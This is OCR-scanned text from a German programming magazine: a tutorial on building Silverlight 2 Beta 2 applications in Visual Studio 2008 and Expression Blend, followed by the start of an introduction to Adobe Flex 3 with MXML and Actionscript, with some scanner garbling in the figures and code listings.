— WPF-basiertes Ul-Framework: Das 
UI-Framework - ein kompatibler Subset 
des UI-Framework in WPF - erleichtert 
das Erstellen von Anwendungen, da 
WPF-Entwickler nicht nur vorhande- 
ne Kenntnisse optimal nutzen, sondern 
teilweise sogar Code, Anwendungsin- 
halte oder Bedienelemente wiederver- 
wenden können. Die neue Version 
bietet eine leistungsstarke Grafik- und 
Animations-Engine, automatisiertes Lay- 
out-Management, two-way Data Bin- 
ding, Styles und ein Template-basiertes 
Skinning der Benutzeroberfläche, also 
ein Verändern des Look & Feel durch 
den Einsatz von Themes. 

- Vorgefertigte Steuerelemente: Mithil- 
fe der zahlreichen mitgelieferten Con- 
trols können Entwickler und Designer 
mit geringem Aufwand umfangreiche 
Anwendungen erstellen. Die Bandbrei- 
te reicht von einfachen Formular-Ele- 
menten über Layout-Container bis zu 
komplexen Daten-Controls. 

— Leistungsfähige Base Class Library: 
Die Silverlight BCL ist ein Subset der 
‚Net Framework Class Library und ent- 
hält neben Basisdatentypen wie Strings 
und Integers Klassen zur Typenum- 
wandlung, Exceptions, Collection- und 
Container-Klassen, Events und Event- 
Handler sowie Klassen für Thread-Ver- 
arbeitung und Synchronisation. 

— Datenverarbeitung: Ein weiteres Fea- 
ture von .Net 3.0, das seinen Weg in 
Silverlight gefunden hat, ist die Unter- 
stützung von LINQ (Language Integra- 
ted Query, inklusive LINQ to Objects 
und Expression Trees). Außerdem gibt 
es APIs zur Serialisierung von Objek- 


von Rich Clients deutlich erleichtern. 


A-TRACT 


e Silverlight ist Microsofts plattform- und browserunabhängige Version des 
‚Net Framework für die Entwicklung multimedialer Webanwendungen. 


© Die Unterstützung dynamischer Sprachen, eine leistungsfähige Klassenbibliothek 
und vorgefertigte Steuerelemente sind nur einige der Features, die die Entwicklung 


@ Entwickler können in Silverlight einen Subset der WPF-Funktionen nutzen und 
Projekte sowohl in Visual Studio 2008 als auch in Expression Blend realisieren. 


e Silverlight-Anwendungen laufen auf jedem beliebigen Webserver. 
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Benötigte Software 


Wer die Beispiele in diesem Tutorial 
praktisch nachvollziehen möchte, benö- 
tigt folgende Software: 

— ‚Net 3.5 

— Visual Studio 2008 

— Expression Blend 2.5 June Preview 


— Microsofts Silverlight Tools für Visual 
Studio 2008 


ten und zur Verarbeitung externer Da- 
ten in verschiedenen Formaten (unter 
anderem XML, RSS, POX und JSON). 
-Umfangreiche Netzwerkunterstützung: 
Die neue Silverlight-Version kann eine 
Reihe von Services ansprechen: WCF 
(Windows Communication Foundation), 
REST, WS*/SOAP, POX, RSS, aber 
auch HTTP-Dienste. Dank der Threa- 
ding-Bibliotheken sind asynchrone Re- 
quests ebenfalls möglich. Dabei kann 
man mit XML-basierten Policy-Dateien 
prinzipiell auch auf Daten in anderen 
Domains zugreifen (analog zu Adobes 
Flash Player). Der Zugriff auf Sockets 
ist in der Beta 2 noch eingeschränkt: 
Verbindungen sind nur auf Ports zwi- 
schen 4502 und 4532 erlaubt. Außerdem 
können Silverlight-Sockets nur selbst 
eine Verbindung aufbauen, sie können 
nicht passiv auf Verbindungen warten. 
Zukünftige Versionen sollen die Be- 
schränkung der Portnummern nicht 
mehr so streng handhaben. 

— HTML-DOM-Manipulation: Als in- 
teressanten Nebeneffekt schlägt Sil- 
verlight eine Brücke zwischen .Net 
und HTML. Ein Entwickler kann das 
HTML-DOM (Document Object Mo- 
del) ebenso via Managed Code manipu- 
lieren, wie er Managed Code per Java- 
script aufrufen kann — dazu benötigt er 
nicht einmal unbedingt eine sichtbare 
UI-Komponente. 

— Isolated Storage: Silverlight 2 bietet 
einen eingeschränkten Zugriff auf das 
Dateisystem des Benutzers: Über den 
„Datei öffnen“-Dialog des Browsers 
lassen sich beliebige Dateien schreib- 
geschützt öffnen. Mittels „isolated local 
storage“ (auch „isostorage“ genannt) 
kann der Benutzer Daten in einer Art 
„Super-Cookie“ persistent auf der loka- 
len Festplatte speichern. Diese Daten 
liegen — außerhalb des Browser Cache 
— in einem versteckten Directory inner- 
halb des Anwenderverzeichnisses. 

In der aktuellen Version ist dieser lo- 
kale Speicherplatz per Default auf 
1 MByte pro URL beschränkt, der Be- 
nutzer kann diesen Wert aber raufsetzen. 
Eine Identifikation dieser lokal gespei- 
cherten Daten erfolgt durch die URL, 
über die die zugehörige Silverlight-An- 
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Webprogrammierung 


Die wichtigsten 
Layout-Controls 


Alle sichtbaren Elemente einer Silver- 
light-Anwendung positioniert der Ent- 
wickler mithilfe von Layout-Controls. 
Man kann sich die drei wichtigsten als 
Container vorstellen, die sämtliche sicht- 
baren Elemente einer Silverlight-An- 
wendung enthalten: 


— Canvas: Der einfachste aller Contai- 
ner ist bereits aus Silverlight 1.0 be- 
kannt und dient hauptsächlich zur ab- 
soluten Positionierung von Elementen. 
-StackPanel: Die Objekte innerhalb 
eines StackPanel lassen sich entwe- 
der neben- oder übereinander anord- 
nen. Die Positionierung der Elemente 
ist nicht absolut, sondern immer rela- 
tiv zum vorhergehenden Element. 

— Grid: In dieser tabellenähnlichen 
Struktur werden Elemente in Zeilen 
und Spalten angeordnet. 


wendung geladen wurde. Ausschließlich 
die Anwendung, die sie zuvor gespei- 
chert hat, kann die Daten lesen. Da sich 
alle Instanzen einer Silverlight-Anwen- 
dung den gleichen isostorage teilen, 
können auch alle auf diese gespeicher- 
ten Daten zugreifen, selbst wenn ihr 
Aufruf in unterschiedlichen Browsern 
erfolgt. 

— Deep Zoom: Diese mit der Beta 1 
eingeführte Technik ermöglicht es, per 
Mausrad mit weichen Übergängen in 
ein Bild (oder eine Collage aus mehre- 
ren Bildern) hinein- und wieder hinaus- 
zuzoomen. Obwohl die Auflösung der 
Bilder sogar bis in den Gigapixel-Be- 
reich reichen kann, braucht der Benut- 
zer nicht darauf zu warten, dass die An- 
wendung das betreffende Bild komplett 
geladen hat, da sie immer nur die Bild- 


bereiche nachlädt, die sie für die ak- 
tuelle Ansicht benötigt. 

Um in Visual Studio 2008 Silverlight- 
2-Anwendungen zu entwickeln, benötigt 
man Microsofts Silverlight Tools (der- 
zeit ebenfalls noch Beta). Diese Erwei- 
terung für VS stellt neben einem Pro- 
jekt-Template „Silverlight Projekt“ für 
C# oder VB.Net Intellisense und Code- 
Generatoren für XAML zur Verfügung, 
ermöglicht das Debugging von Silver- 
light-Anwendungen und bietet außer der 
Unterstützung von Web References ein 
nahtloses Zusammenspiel mit der ak- 
tuellen Version von Expression Blend 
(2.5 June Preview), Microsofts Design- 
werkzeug für WPF-basierte, interaktive 
Benutzeroberflächen. 

Die benötigten Installer sind über Mi- 
crosofts Download Center (siehe „On- 
linequellen“) zu beziehen und enthalten: 
— Silverlight 2 Beta 2 
- Silverlight 2 SDK Beta 2 
- KB950630 for Visual Studio 2008 
— Silverlight Tools Beta 2 for Visual 
Studio 2008 

Achtung: Die vorherige Installation 
einer alten Silverlight Beta oder des 
SDK lässt den Installer abbrechen, es 
empfiehlt sich, beides vorher zu dein- 
stallieren. Hilfe (in englischer Spra- 
che) bei Installationsschwierigkeiten 
findet man unter anderem in „Bradley- 
B’s WebLog“ (siehe „Onlinequellen“). 

Als Systemvoraussetzungen nennt 
Microsoft: 

— Windows Server 2003, Windows 
Vista oder Windows XP 

— VS 2008 Standard oder höher 

— Optional: Microsoft Expression Blend 
(2.5 June Preview) 

Nach einer erfolgreichen Installation 
der Software kann es losgehen: Visual 
Studio 2008 starten und ein neues Pro- 
jekt anlegen. Dazu wählt man aus dem 
Menü „File —> New —> Project“. Als 
Nächstes muss man sich für eine Spra- 


eure ||| 1: 
25: 
Brojact types: Templates: ‚NET Framewark 3.5 =) 22: 
= p 
Visual C# Visual Studie installed templates 
PSiverlicht Application PSiverlcht Class Library 
evica 
A My Templates 


Work 


Name: 


Location: 


Sohition Name: 


ojeck Types 


Psearch Online Temelstes... 


fo 

% Other Languages 
B- Other Pr 
# Test Projects 


Visual Studio 2008 
unterstützt den 
.Net-Entwickler in 


A projest for cresting & Sbverlight Application which uses ‚Net to peowide rich web eperiences (NET Framewark 3.5) 


Helkälwerlicht ; 

STmIErT Sie gewohnter Weise 

Helsshverlcht 7 Greste drectory for soltion beim Anlegen eines 
— neuen Projekts 


50 


(Abb. 1). 


che entscheiden. Wer in C# entwickeln 
will, wählt hier direkt Visual C# — wer 
etwa VB vorzieht, wählt „Visual Basic“. 
Danach wählt man „Silverlight Appli- 
cations“ im Templates-Fenster. Zum 
Schluss gibt man den Namen des Pro- 
jekts, den Speicherort und den Namen 
der „Solution“ an und bestätigt alles mit 
„OK“. 


Ein Silverlight-Projekt 
in Visval Studio ... 


Jede Silverlight-Anwendung benötigt 
zumindest einen HTML-Container, in 
den sie eingebettet wird. Der Entwick- 
ler kann aber auch gleich eine komplette 
Website anlegen lassen. 

Wählt man die erste Variante, erzeugt 
Visual Studio zusätzlich zum Silver- 
light- ein Webprojekt — die zugehörige 
Testanwendung - innerhalb der neuen 
Solution. Dieses Standard-Webprojekt 
enthält sowohl eine ASP.Net-, als auch 
eine statische HTML-Seite, die beide 
zum Testen der Silverlight-Anwendung 
vorbereitet sind. Dazu kann der in VS 
eingebaute Webserver dienen — sodass 
man die Daten zunächst nicht auf einen 
externen Webserver spielen muss. Im 
Rahmen des Build-Vorgangs kopiert Vi- 
sual Studio die kompilierte Silverlight- 
Anwendung automatisch in das zugehö- 
rige Webprojekt. 

Wählt man die zweite Variante, fügt 
dies dem Silverlight-Projekt lediglich 
eine weitere HTML-Testseite hinzu. 

Prinzipiell können Silverlight-Anwen- 
dungen auf jedem beliebigen Webserver 
liegen (beispielsweise auf einem Apa- 
che-Server unter Linux) und in statische 
HTML-Dateien oder beliebige server- 
seitig erzeugte Seiten (etwa über PHP, 
Java, Python, Ruby et cetera) eingebun- 
den werden — eine Bindung an den IS 
wie bei ASP.Net-Webs gibt es nicht. 


... und in Expression 
Blend entwickeln 


Visual Studio 2008 und Expression 
Blend verwenden das gleiche Dateifor- 
mat für Solutions und Projekte, ein 
neues Silverlight-Projekt lässt sich also 
ebenso gut aus Blend heraus anlegen. 
Das gleichzeitige Öffnen eines Projekts 
in beiden Anwendungen und die Mög- 
lichkeit zum Roundtrip Editing ist einer 
der rollen- und teamunterstützenden 
Aspekte der Silverlight-Tools. 

Um ein neues Silverlight-Projekt in 
Blend zu erzeugen, wählt man im Menü 
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Listing 1 
<div id="silverlightControlHost"> 
<paran name="source" value="HelloSilverlight.xap"/> 


<paran name="onerror" value="onsilverlightError" /> 
<paran name="background" value="white" /> 


<la> 
<lobject> 


<ldiv> 


<object data="datasapplication/x-silverlight," type="application/x-silverlight-2-b1" width="100%" height="1004"> 


<a href="http://go.microsoft.com/fulink/?Link1D=108182" style="text-decoration: none; "> 
sing sre="http://go.nicrosoft.com/fwLink/?Link1d=108181" alt="Get Microsoft Silverlight" 


sifrane style='visibilityshidden;height:0;width:0;border:0px'></iframe> 


style="border-style: none" /> 


Über den <object>Tag kann der Anwender eine Silverlight-XAP-Datei in eine 


HTML-Seite einbetten. 


„File —> New Project“, sucht dann das 
zu „Silverlight 2 Application“ gehörige 
Icon aus und klickt „OK“. 

Der Solution Explorer von Visual 
Studio listet alle Dateien auf, die mit 
dem neu angelegten Silverlight Projekt 
zusammenhängen. Das erste Projekt 
(im Beispiel HelloSilverlight_Web), 
enthält die Website, die mit der Silver- 
light-Anwendung verbunden ist: 

— Default.aspx — eine (noch) leere 
ASP.Net-Seite, der Standard-Einstiegs- 
punkt für jedes ASP.Net-Projekt, 


pression\Expression Blend Projects 


Language Visual ce 


Wer will, kann ein neues Silverlight- 
Projekt auch aus Expression Blend 
heraus anlegen (Abb. 2). 


- HelloSilverlightTestPage.aspx — ei- 
ne ASP.Net-Seite, 

— HelloSilverlightTestPage.html — eine 
statische HTML-Seite, in die die Silver- 
light-Anwendung eingebettet ist, und 

— web.config — eine Datei mit Vorein- 
stellungen und der Konfiguration der 
Webapplikation. 

Mit der rechten Maustaste klickt der 
Anwender entweder auf HelloSilver- 
lightTestPage.aspx oder HelloSilver- 
lightTestPage.html und wählt „Set As 
Start Page“ aus, um vorab festzulegen, 
welche Seite beim Start der Weban- 
wendung ausgewählt sein soll. Nun 
braucht man nur noch F5 zu drücken, 
um die Silverlight-Anwendung zu er- 
stellen, sie zu starten und zu testen. 

Um eine Silverlight-2-Anwendung 
händisch in eine HTML-Seite einzubet- 
ten, genügt es, einen Verweis auf die 
XAP-Datei über den <object>-Tag zu 
setzen, Javascript ist dafür nicht nötig. 
Beim Seitenaufruf lädt das Plug-in die 
XAP-Datei, instanziiert sie und bettet sie 
in die HTML-Seite ein (Listing 1). 

Das zweite Projekt im Solution Ex- 
plorer (HelloSilverlight) enthält die 


Solution Explorer - Solution 'HelloSilverlighe TZ pr5} 
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Der Solution Explorer gibt einen 
Überblick über die zu dem neuen 
Projekt gehörigen Dateien (Abb. 3). 


XAML-Dateien (beschreiben die Dar- 
stellung der Anwendung) sowie deren 
zugehörige Code-behind-Dateien (ent- 
halten den .Net-Quellcode und beschrei- 
ben die Funktion). Standardmäßig gehö- 
ren zu jeder neuen Anwendung zwei 
XAML-Dateien: Appxaml und Page. 
xaml. 

Hinter App.xaml/App xaml.cs steht 
eine Subklasse von Application. Die Da- 
tei dient als Einstiegspunkt in die An- 
wendung und enthält im Normalfall 
Ressourcen, die in der gesamten Appli- 
kation Verwendung finden können, wie 
Styles, Brushes, Storyboards et cetera. 
In der zugehörigen Code-behind-Datei 
kann man auf Events reagieren, die auf 
Anwendungsebene erfolgen. Drei sol- 
cher Ereignisse sind in einem neu an- 
gelegten Projekt vorkonfiguriert, sie 
können bei Bedarf mit Leben gefüllt 
werden: 
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Webprogrammierung 


Listing 2 
public Page() 
{ 

InitializeConponent(); 

Loaded += new RoutedEventHandler(Page_Loaded); 
} 
void Page_Loaded(object sender, RoutedEventArgs e) 
L 

NyButton.Click += new RoutedEventHandler( 

NyButton_Click); 

} 
void MyButton_Click(object sender, RoutedEventArgs e) 
{ 


if ({MyButton.Content as String).Contains( 
"Klick nich") 
{ 


MyButton.Content = "Button geklickt!"; 
else 
{ 


MyButton.Content = "Klick mich nochnal!"; 


Die Zuweisung eines Event-Handler 
zu einem Control kann per XAML oder 
wie hier im ‚Net-Code erfolgen. 


— Application_Startup: Hier müssen al- 
le Initialisierungen erfolgen, die beim 
Start der Anwendung anfallen. 

— Application_Exit: Dieser Event ist für 
alles zuständig, was zum sauberen 
Schließen der Anwendung notwendig 
ist (eventuelle Aufräumarbeiten, letzte 
Daten speichern ...). 

— Application_UnhandledException: 
Hier landen alle Exceptions, die die 
Anwendung nicht anderweitig abfängt. 

Die Datei Page xaml/Page.xaml.cs 
beschreibt die Benutzeroberfläche und 
andere Objekte der Anwendung. Durch 
Voreinstellung lädt eine Anwendung 
bei ihrem Aufruf Page xaml als Erstes 
UI Control. Darin können weitere UI 
Controls die Benutzerschnittstelle fest- 
legen, deren Events die zugehörige 
Code-behind-Klasse verarbeitet (spä- 
ter mehr dazu). 

Bei einem Silverlight-Projekt gibt es 
die Voreinstellung, dass Visual Studio 
Code und XAML-Markup in eine Stan- 
dard-.Net-Assembly kompiliert und zu- 
sammen mit den statischen Ressourcen 
(Bilder et cetera) in eine XAP-Datei auf 
der Festplatte speichert. XAP-Dateien 


oe oe 
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benutzen den ZIP-Algorithmus, um den 
Download auf den Client zu minimie- 
ren, eine „Hello World“-Anwendung 
(ohne Verwendung der DLR) belegt da- 
durch nur etwa 4 KByte. 

Noch tut die Beispiel-Anwendung 
nichts und zeigt nach dem Start ledig- 
lich eine leere, weiße Seite. Das Einfü- 
gen von ein paar Ul-Elementen in die 
Datei Page.xaml ändert dies. 


Fertige Controls 
erleichtern die Arbeit 


Die Beta-Version stellt bereits eine 
Vielzahl fertiger Bedienelemente zur 
Verfügung, die finale Release soll so- 
gar noch mehr Controls enthalten. 
Manche sind als zusätzliche Assem- 
blies implementiert: Verwendet man 
sie, packt Silverlight die zugehörigen 
Dateien mit in die XAP-Datei und lie- 
fert sie an den Browser aus, was Ein- 
fluss auf die Dateigröße hat. Über 30 
der gebräuchlichsten Steuerelemente 
sind jedoch bereits Teil der Runtime 
(System.Windows.dll): Setzt man aus- 
schließlich diese ein, können Applika- 
tionen weiterhin mit einem sehr kom- 
pakten Dateigewicht auskommen. 
Wer mit ASP.Net oder WPF ver- 
traut ist, dürfte mit den Controls für 
Silverlight keine Schwierigkeiten ha- 
ben. Schon verfügbar sind verschiedene 
Layout-Container (Canvas, Grid, Stack- 
Panel, TabPanel), Vektorformen (Line, 
Ellipse, Rectangle), Medienelemente 
(TextBox, Image, MediaElement) sowie 
interaktive (Button, CheckBox, Radio- 
Button), datengetriebene (ListBox, Da- 
taGrid) und komplexe Controls (bei- 
spielsweise Calendar oder DatePicker). 
Alle lassen sich relativ einfach in 
Aussehen (durch Styles oder Templates) 
und Funktion an individuelle Bedürf- 
nisse anpassen (seit der Juni-Preview 
von Expression Blend sogar mithilfe 
eines visuellen Editors ohne Program- 
mierkenntnisse und ohne vorhandene 


Ereignisbehandlung zu beeinflussen). 
Wem das nicht ausreicht, kann wie ge- 
wohnt eigene Steuerelemente entwi- 
ckeln oder die vorhandenen mittels Ver- 
erbung ergänzen. 

Standardmäßig ist das oberste Ele- 
ment der XAML-Struktur innerhalb ei- 
ner Silverlight-Anwendung (Page) ein 
Grid mit dem Namen LayoutRoot. 

Um einen Button in die Anwen- 
dung einzufügen, zieht man ihn aus 
der Toolbox per Drag & Drop an die 
gewünschte Stelle in der XAML-Da- 
tei. Anschließend kann der Anwender 
die gewünschten Eigenschaften des 
Button über dessen Attribute näher be- 
stimmen: So bekommt der Button 
mittels x:Name eine eindeutige ID (et- 
wa MyButton), über die man ihn spä- 
ter innerhalb der Code-behind-Klasse 
ansprechen kann. Weitere Eigenschaf- 
ten des Button wie Beschriftung (Con- 
tent) und Dimensionen (Width, Height) 
kann der Entwickler analog per XAML 
definieren: 


<Grid x:Name="LayoutRoot" Background="White"> 
<Button x:Name="MyButton" Content ="Klick 7 
mich!" Width="200" Height="30" /> 

</Grid> 


Alternativ zur Definition der Controls 
über XAML können diese per Code zur 
Laufzeit hinzugefügt werden. 


Große Ereignisse werfen 
ihre Schatten voraus 


Es gibt zwei Möglichkeiten, Steuerele- 
mente mit Event-Handlern zu ver- 
knüpfen, eine ist der Weg direkt über 
XAML (in diesem Fall bleibt einem 
allerdings das Hinzufügen von Para- 
metern verwehrt). Die Zuweisung ei- 
nes Handler zum Klick-Ereignis des 
vorher platzierten Button könnte so 
aussehen: 
<Button x:Name="MyButton" Content="Klick mich!" 
Width="200" Height="30" Click="MyButton_Click" 7 
/> 


Silverlight Tools Beta 2 für Visual Studio 2008 


www.microsoft.com/downloads/details.aspx®displaylang=en&FamilyID=50u9ec0 1-267b-4521- 
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Den eigentlichen Event-Handler muss 
der Entwickler in jedem Fall noch in 
Page.xaml.cs, implementieren. Das 
könnte folgendermaßen aussehen: 


private void MyButton_Click(object sender, 7 
RoutedEventArgs e) 


MyButton.Content = "Button geklickt!"; 


Die Signatur der Methode ähnelt der al- 
ler Event-Handler von .Net: Es gibt 
keinen Rückgabewert und genau zwei 
Parameter — eine Referenz auf das aus- 
lösende Objekt sowie einen Argumente- 
Parameter. Das Beispiel weist dem But- 
ton eine neue Beschriftung zu. 

Obwohl die Zuweisung von Event- 
Handlern per XAML einfach ist, spricht 
einiges für die Alternative, diese Zuwei- 
sung ebenfalls im .Net-Code vorzuneh- 
men. In der Praxis erfolgt die Zuord- 
nung der Event-Handler zu den Controls 
innerhalb des Page.Loaded-Handler der 
Silverlight-Anwendung. Mithilfe der 
Intellisense-Unterstützung von VS, die 
ebenfalls Silverlight-fähig ist, geht auch 
dies leicht von der Hand (Listing 2). 


Ausblick 


Wie aufgrund der Architektur von Sil- 
verlight nicht anders zu erwarten war, © 
gibt es große strukturelle Gemeinsam- 
keiten mit der Desktop-basierten .Net- 
Entwicklung, aber auch mit ASP.Net — 
und gerade da liegt eine der Stärken von 
Silverlight. Entwicklern mit .Net-Skills, 
die bisher den Einstieg in die RIA-Welt 
wegen der Hürde gescheut haben, neue 
Sprachen und Anwendungs-Frame- 
works erlernen zu müssen, eröffnet sich 
nun ein leichter Einstieg. Silverlight ver- 
längert das Konzept von WPF zur Tren- 
nung von Funktion und Inhalt ins Web. 
Im Zentrum des nächsten Tutorial- 
teils stehen die Verwendung weiterer 
Controls, das Hinzufügen von mehr 
Interaktivität und der Einsatz von Ex- 
pression Blend bei der Gestaltung der 
Oberfläche. (ka) 
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Flash-Clients 


Grundlagen der Programmierung ı 


Flexen für 


‚Kai König 


Früher nutzten Flash-Entwickler ausschließlich die mit 
Filmmetaphern gespickte Flash-Autorenumgebung. Seit einigen 
Jahren steht ihnen mit Flex eine Alternative zur Verfügung, die 
eine von anderen Frameworks bekannte Arbeitsweise unterstützt. 
Eine kleine Anwendung ist damit schnell geschrieben. 


icht zuletzt dadurch, dass Adobe 
N Flex 3 unter die Mozilla Public 

License (MPL) gestellt hat, er- 
freut sich das Framework für die Ent- 
wicklung von Rich Internet Applica- 
tions (RIAs) wachsender Beliebtheit. 
Dieser Artikel führt anhand des Flex 
SDK (siehe „Onlinequellen“ [a]) sowie 
der (für rund 200 Euro) kommerziell 
verfügbaren Builder-IDE der Version 3 
in die Flex-Entwicklung ein. Adobe 
bietet eine 60-Tage-Trial-Lizenz zum 
Download an [b]. Alle Codebeispiele 
sind auch nur mit dem SDK kompilier- 
und ausführbar; die Nutzung des Buil- 
der vereinfacht jedoch das Codema- 
nagement und verschiedene Refacto- 
ring-Aufgaben, sodass zu erwarten ist, 
dass Flex Builder 3 sich als IDE-Tool 
für die Flex-Entwicklung im professio- 
nellen Umfeld etablieren wird. 
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Wer sich für die Arbeit mit dem 
Software Development Kit von Flex 3 
entscheidet, dem stehen auf der Down- 
load-Seite des SDK zwei Versionen zur 
Verfügung. Bei der ersten handelt es 
sich um das sogenannte Free Adobe 
Flex SDK, das zweite trägt den Namen 
Open Source Flex SDK. Beide erlau- 
ben die Entwicklung lauffähiger RIAs; 
der Hauptunterschied ist, dass das Free 
Adobe Flex SDK einige zusätzliche, 
nicht unter der MPL stehende Kompo- 
nenten enthält. Unter anderem handelt 
es sich dabei um den Flash Player, die 
Desktop-Laufzeitumgebung AIR, unter 
einer kommerziellen Lizenz verfügba- 
re Schriftbibliotheken sowie die benö- 
tigten Anknüpfungspunkte im SDK, 
um die kostenpflichtigen Charting-Bi- 
bliotheken mit dem Flex-3-SDK ver- 
wenden zu können [c]. 


Nach der Installation des für Win- 
dows und Mac OS X erhältlichen Flex 
Builder steht auch sofort das Flex 
SDK zur Verfügung und präsentiert 
sich nahtlos in die IDE integriert. Das 
SDK wird als Archivdatei ausgeliefert 
und ist nach dem Entpacken in einen 
beliebigen Ordner betriebsbereit. Flex 
Builder 3 für Linux ist in Form einer 
kostenlosen Alpha-Release auf Adobe 
Labs zum Download erhältlich [d] und 
sollte ohne Schwierigkeiten unter Li- 
nux zu betreiben sein. Bemerkenswert 
ist an dieser Stelle noch, dass Adobe 
die gesamte Flex-Dokumentation on- 
line in verschiedenen Formaten kos- 
tenfrei anbietet [e]. 


Java-Laufzeitumgebung 
ist Voraussetzung 


Ein guter Test, um die Funktionsfähig- 
keit der SDK-Installation zu überprü- 
fen, ist die Kompilierung der mitgelie- 
ferten Quellen des Flex 3 Component 
Explorer. Sie finden sich im Unterord- 
ner samples/explorer der SDK-Instal- 
lation. Die Dateien build.bat (für Win- 
dows) sowie build.sh (für Mac OS X 
und *nix) nutzen den im bin-Ordner 
des SDK enthaltenen MXML-Compi- 
ler mxmlc und erzeugen verschiedene 
SWF-Dateien, die eine Hauptapplika- 
tion als Module nachlädt. mxmic und 
die anderen Kommandozeilenwerkzeu- 
ge sind in Java entwickelt und benöti- 
gen daher eine installierte Java-Lauf- 
zeitumgebung auf Basis der Version 1.4 
oder 5, die nicht Teil des SDK-Pakets 
von Adobe ist. 

Beide Build-Dateien eignen sich des 
Weiteren als Studienobjekt für die mög- 
liche Nutzung der Kommandozeilen- 
werkzeuge in automatisierten Batch- 
scripts. Den Flex 3 Component Explorer 
kann man nach erfolgreicher Überset- 
zung über die vom Compiler erzeugte 
Datei explorer.html im Ordner sam- 
ples/explorer in einem Webbrowser 
aufrufen. Am umkompliziertesten ge- 
lingt das, wenn man den explorer-Ord- 
ner in den Dokumentenbereich eines lo- 
kalen oder entfernten Webservers legt; 
andernfalls (bei lokalem Aufruf über 
eine file://-URL;) läuft man Gefahr, sich 
bereits zu Beginn mit Restriktionen der 
Security-Sandbox des Flash Player aus- 
einandersetzen zu müssen. 

Der einfachste Weg zu einer neuen 
Anwendung in Flex Builder 3 führt 
über den Projekt-Assistenten (Abbil- 
dung 1). Zum Anlegen eines Flex-Pro- 
jekts muss man neben einem Namen 
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und dem Speicherort angeben, ob die 
Applikation den Flash Player oder Ado- 
bes AIR als Zielplattform nutzen soll. 
Darüber hinaus kann man hier eine 
eventuell genutzte Servertechnik spe- 
zifizieren, diese Auswahl lässt sich ge- 
gebenenfalls aber im weiteren Verlauf 
eines Projekts nachholen. 

Abbildung 2 zeigt die vom Projekt- 
Assistenten erzeugte Struktur. Diese ist 
offensichtlich auf Flex Builder 3 zuge- 
schnitten und beinhaltet dementspre- 
chend verschiedene Konfigurationsda- 
teien, die man in einem Projekt mit 
dem Flex SDK nicht benötigt. Trotz al- 
lem ist die verwendete Ordnerstruktur 
einen Blick wert, da sie für eine saube- 
re Trennung zwischen Quellcode, Bi- 
närdateien und HTML-Vorlagen sorgt. 
Der Order src dient der Speicherung 
der Quelldateien. Oftmals findet man 
hier neben Actionscript- und MXML- 
Quellen weitere Unterordner wie as- 
sets, skins oder styles. In libs liegen ex- 
terne Bibliotheken und hrml-template 
beinhaltet generische HTML-Vorlagen, 
die der Compiler nutzt, um die HTML- 
Containerdateien für die SWF-Applika- 
tion zu erzeugen. Diese Vorlagen ent- 
halten eine in Javascript implementierte 
Flash-Erkennung sowie — über inklu- 
dierte JS-Dateien — History-Funktio- 
nen. Bei Letzteren handelt es sich um 
die Anbindung der Browser-Naviga- 
tions-Buttons an eine Flex-Applikation. 
Der Ordner bin-debug wird genutzt, 
um die kompilierten SWF-Dateien so- 
wie die weiter oben angesprochenen 
HTML-Container-Dateien zu speichern 
und von dort aus auszuführen. 


Zwei Sprachen, 
zwei Einsatzzwecke 


Nach den benötigten Schritten zum Auf- 
setzen der Umgebung und gegebenen- 
falls des Projekts ist der nächste Schritt 
das Schreiben einer ersten Anwendung. 
Flex bietet dazu neben dem deklarativen 


en® 


Create a Flex project. 


Der Projekt-Assistent 
von Flex Builder 3 
unterstützt den 
Entwickler beim 
Anlegen eines neuen 
Projekts (Abb. 1). 


Choose u nat 


Project name: ixDataMarager 
Project location 
Muse default location 


Folder, 


Application type 


me and location far your project 


New Flex Project 


@ (web applicanion (runs in Flash Player) 


) {Desktop application (runs in Adobe AiR) 


Server technology 


Application server type: | None [22] 


MXML das aus Flash bekannte Action- 
script in der Version 3. Actionscript hat 
sich im Laufe der Jahre zu einer typi- 
sierten objektorientierten Sprache entwi- 
ckelt, die Java oder C# sehr ähnlich ist. 
MXML und Actionscript dienen unter- 
schiedlichen Zwecken, und als Faust- 
regel lässt sich sagen, dass Erstere für die 
Views einer Applikation verwendet wird, 
wohingegen Actionscript für clientseiti- 
ge Geschäftslogik, den Controller und 
die Event-Behandlung genutzt wird. 

Von einem technischen Standpunkt 
aus gesehen ist MXML nichts anderes 
als ein Abstraktionslayer über Action- 
script, der bestimmte Funktionen und 
Komponenten auf einfache Art verfüg- 
bar macht. Der Kompilierungsvorgang 
überführt MXML in Actionscript und 
erzeugt letztlich aus Actionscript-Code 
die ausführbare SWF-Datei. 

Listing 1 zeigt den typischen „Hello 
World“-Showcase in Flex mit MXML. 
Hieran ist erkennbar, dass es sich bei 
MXML um eine XML-Sprache han- 
delt, deren Elemente der Entwickler 
korrekt schachteln und schließen muss; 
jede MXML-Datei muss zudem wohl- 
geformt und gültig sein sowie mit einer 
XML-Deklaration beginnen. Der Name- 
space von MXMIL-Tags, die Teil des 
Flex-Framework sind, lautet in der 
Regel mx; für eigene Komponenten 


Event-Behandlung. 


A-TRACT 


@ Mit Adobes Flex SDK 3, das mittlerweile unter der Mozilla Public License frei erhält- 
lich ist, können Webprogrammierer Rich Internet Applications erstellen. 


@ Einfacher und komfortabler ist die Anwendungsentwicklung, wenn man zusätzlich 
die kommerzielle Builder-IDE verwendet; die Beispiele dieses Artikels lassen sich 
aber auch allein mit dem SDK nachvollziehen. 


© Flex Anwendungen nutzen das deklarative MXML für die Gestaltung der Oberfläche 
und das objektorientierte Actionscript für die Geschäftslogik, den Controller und die 


Next > 


oder zur Kennzeichnung verschiedener 
Bestandteile einer Applikation definiert 
der Entwickler üblicherweise weitere 
Namespaces. 

<mx:Application> legt den Kontext 
der gesamten Applikation fest. Pro An- 
wendung ist nur ein solcher Tag erlaubt, 
dessen Deklaration im Normalfall in der 
Hauptdatei erfolgt. Das layout-Attribut 
kann einen von drei Werten annehmen. 
Neben dem hier verwendeten absolute 
(alle Kindkomponenten müssen explizit 
mit x- und y-Koordinaten versehen wer- 
den) sind die Werte horizontal und ver- 
tical erlaubt. Die Letzteren implementie- 
ren einfache Layout-Manager für den 
Application-Container, die in ähnlicher 
Form in den HBox-, VBox- sowie Box- 
Containern vorhanden sind, wohingegen 
die Verwendung von layout=“abso- 
lute“ den Application-Container in ei- 
nen Modus schaltet, der dem Canvas- 
Container ähnelt. 


Ant-Task erleichtern 
Build-Prozesse 


Kompiliert man diese Anwendung mit 
dem Flex Builder oder dem SDK, er- 
hält man eine SWF-Datei, die sich 
entweder in einer Stand-alone-Version 
des Flash Player [f] ausführen lässt 
oder einen HTML-Wrapper benötigt. 
